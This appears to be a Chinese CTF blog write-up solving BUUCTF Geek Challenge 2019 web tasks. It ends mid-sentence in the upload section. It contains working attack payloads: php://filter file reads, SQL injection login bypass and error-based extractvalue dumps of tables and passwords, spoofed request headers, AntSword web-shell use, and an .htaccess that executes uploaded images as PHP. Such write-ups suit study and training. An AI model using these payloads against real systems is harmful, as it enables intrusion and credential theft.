BUUCTF-WEB(9-14)
[极客大挑战 2019]Secret File打开题目检察源码,找到了一个文件
https://img2023.cnblogs.com/blog/3439569/202405/3439569-20240519145308171-972188382.png
然后就是一个按钮,点击后,他应该是反应了,但是我们看不到
https://img2023.cnblogs.com/blog/3439569/202405/3439569-20240519145307526-519514451.png
那我们抓包看看,这里是Burp抓包后,发到重发器发送了一遍,看看响应包,发现了
https://img2023.cnblogs.com/blog/3439569/202405/3439569-20240519145307209-313178526.png
然后访问这个网页就是一个源码
https://img2023.cnblogs.com/blog/3439569/202405/3439569-20240519145306550-970001842.png
这里没有过滤php://filter
?file=php://filter/read=convert.base64-encode/resource=flag.phpbase64解密后得到flag
https://img2023.cnblogs.com/blog/3439569/202405/3439569-20240519145305939-1435854637.png
[极客大挑战 2019]LoveSQL
先用全能账号暗码试试,乐成登录
1'or true#https://img2023.cnblogs.com/blog/3439569/202405/3439569-20240519145305189-652968923.png
登陆进去没啥用,可能藏在数据库了,这次我们用报错注入,因为我试了,他会有报错语句
爆库名
1' and extractvalue(1,concat(0x7e,(select database()),0x7e))or 'https://img2023.cnblogs.com/blog/3439569/202405/3439569-20240519145304448-921780679.png
爆表名
1' and extractvalue(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='geek'),0x7e))or 'https://img2023.cnblogs.com/blog/3439569/202405/3439569-20240519145304120-411713779.png
先爆这个love这个表里面的列,毕竟他和题目一样名字
1' and extractvalue(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema='geek' and table_name='l0ve1ysq1'),0x7e))or 'https://img2023.cnblogs.com/blog/3439569/202405/3439569-20240519145303743-1865397421.png
然后爆数据(我觉得我挺傻逼,我爆到第15行才有flag,纯手搓)
1' and extractvalue(1,concat(0x7e,(select password from l0ve1ysq1 limit 15,1),0x7e))or 'https://img2023.cnblogs.com/blog/3439569/202405/3439569-20240519145303407-2037436671.png
然后我发现死活得不到后半段,只要一看16行就报错,我也是不懂了,所以最后我就正常得到数据的
1' union select 1,2,group_concat(password) from l0ve1ysq1#https://img2023.cnblogs.com/blog/3439569/202405/3439569-20240519145302959-53363752.png
[极客大挑战 2019]Http
打开题目发现是卖鞋厂,我也是慌了,看看源代码有没有信息吧
https://img2023.cnblogs.com/blog/3439569/202405/3439569-20240519145302316-1608293876.png
找到了,那我们就访问一下
https://img2023.cnblogs.com/blog/3439569/202405/3439569-20240519145301876-1196916707.png
抓包开搞:
说我不是这里来的
https://img2023.cnblogs.com/blog/3439569/202405/3439569-20240519145301129-1411364545.png
Referer:https://Sycsecret.buuoj.cn又提示不是这个欣赏器
https://img2023.cnblogs.com/blog/3439569/202405/3439569-20240519145300386-1857160478.png
User-Agent: Syclover又提示不是当地访问
https://img2023.cnblogs.com/blog/3439569/202405/3439569-20240519145259806-1877879669.png
X-Forwarded-For:127.0.0.1总的请求头就是这个:
https://img2023.cnblogs.com/blog/3439569/202405/3439569-20240519145259107-1694879887.png
拿下flag:
https://img2023.cnblogs.com/blog/3439569/202405/3439569-20240519145258558-597984965.png
[极客大挑战 2019]Knife
https://img2023.cnblogs.com/blog/3439569/202405/3439569-20240519145257902-685669804.png
蚁剑直接连接
https://img2023.cnblogs.com/blog/3439569/202405/3439569-20240519145257391-2046314956.png
根目次找到flag
https://img2023.cnblogs.com/blog/3439569/202405/3439569-20240519145256852-463504143.png
[极客大挑战 2019]Upload
这道题就是我发现可以上传.htaccess文件
所以这里我就抓包上传
<IfModule mime_module>
SetHandler application/x-httpd-php
</IfModule>https://img2023.cnblogs.com/blog/3439569/202405/3439569-20240519145256420-377164395.png
然后开始上传图片马
这道题过滤了 <strong>
页:
[1]